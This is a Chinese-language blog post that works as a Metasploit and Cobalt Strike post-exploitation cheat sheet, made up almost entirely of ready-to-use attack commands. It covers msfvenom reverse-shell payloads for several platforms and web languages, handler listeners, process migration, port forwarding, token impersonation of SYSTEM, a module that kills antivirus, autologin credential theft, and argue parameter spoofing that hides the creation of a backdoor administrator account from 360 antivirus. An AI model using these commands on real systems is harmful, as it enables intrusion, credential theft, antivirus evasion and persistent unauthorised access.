本文已参与「新人创作礼」活动.一起开启掘金创作之路。
0x01 msfvenom
1、msf生成木马
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=port -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=port -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=port -f macho > shell.machoWeb Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=port -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=port -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=port -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=port -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=port -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT= port -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=port -f raw > shell.pl
2、接收反弹会话
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp //payload视具体情况而定
set LHOST 192.168.192.148
set LPORT 6666
exploit
0X02 进程迁移
1、获取当前进程PID
getuid
2、获取进程列表
ps
3、转移进程
migrate PID
4、杀死进程
kill PID
自动迁移进程
run post/windows/manage/migrate
设置上线自动转移进程
set autorunscript migrate -f
下面是迁移了一个system管理的进程,迁移成功之后我们也是获得了对应的system权限。
0x03 端口转发
portfwd add -l 7777 -p 3389 -r 192.168.189.194
-l 本地监听端口
-r 内网目标的IP
-p 内网目标的端口
将靶机的3389端口转发到我们本地的7777端口
portfwd add -l 7777 -p 3389 -r 192.168.189.194
端口转发成功之后我们就可以使用远程桌面连接本地的7777端口
0x04 设置 Socks5代理
use auxiliary/server/socks_proxy
jobs 查看socks工作
kill 0
0x05 添加路由
run post/multi/manage/autoroute
run autoroute -p
0x06 令牌窃取
使用模块
use incognito
查看可用token
list_tokens -u
假冒用户身份
impersonate_token "NT AUTHORITY\SYSTEM"
返回原始权限
rev2self
0x07 提权
use post/multi/recon/local_exploit_suggester 查看可以利用的漏洞
0x08 其他
sysinfo 获取系统信息
run post/windows/gather/checkvm 查看目标是否允许在虚拟机
idletime 最近运行的时间
route 查看目录完整网络
getuid 当前用户名
run post/windows/manage/killav 关闭杀毒软件
run post/windows/manage/enable_rdp 开启3389
run post/windows/manage/autoroute 目标子网情况
background 隐藏后台
route add 添加路由
route print查看
run post/windows/gather/enum_logged_on_users 列举当前有多少用户登录过目标主机
run post/windows/gather/enum_applocations 列举安装在目标主机上
run post/windows/gather/credentials/windows_autologin 抓取自动登录的用户名密码
load espia screengrab 抓取此时屏幕截图
0x09 MSF&CobaltStrike联动
MSF联动CS
1、msf获得一个会话
2、在CS上设置监听
3、将msf中的会话传到CS中
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set session 1
set lhost 192.168.189.148
set lport 6666
run
4、CS中成功上线
CS联动MSF
1、在msf中设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.189.148
set lport 4444
run
2、在CS中设置监听
3、将CS中的会话派生给MSF
4、选择刚才设置的监听
5、msf成功收到会话
0x10 CobaltStrike argue 参数污染 绕过杀软
使用前提:administrator 或 system权限。执行创建新用户命令,360报毒
使用argue参数污染net1
argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxx
argue 查看污染的参数
用污染的 net1 创建用户,发现创建成功,360也不报毒
#用污染的net1执行敏感操作
execute net1 user test root123 /add
execute net1 localgroup administrators test /add
成功添加用户